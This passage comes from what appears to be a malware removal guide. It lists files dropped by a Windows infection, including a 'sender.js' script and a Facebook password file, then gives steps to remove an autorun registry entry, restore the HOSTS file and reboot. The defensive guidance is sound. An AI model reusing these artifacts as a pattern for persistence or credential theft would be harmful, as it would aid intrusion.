   %System%\wistjhoy\rng (160 bytes)
   %System%\wistjhoy\ihst (158 bytes)
   %System%\ausksswsax.exe (7547 bytes)
   %System%\wistjhoy\aol\sender.js (980 bytes)
   %WinDir%\Temp\stotxqfehx64ck.exe (35 bytes)
   %System%\wistjhoy\aol\facebook01pass.txt (1 bytes)
   %System%\wistjhoy\aol\tmp\lousm2003.exe (1373 bytes)
   %System%\wistjhoy\aol\exefile (14580 bytes)
   %System%\drivers\etc\hosts (852 bytes)
   %System%\bvlwninlaq.exe (7547 bytes)
   %System%\wistjhoy\etc (10 bytes)
   

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Engine Manager TCP/IP Topology" = "%System%\bvlwninlaq.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.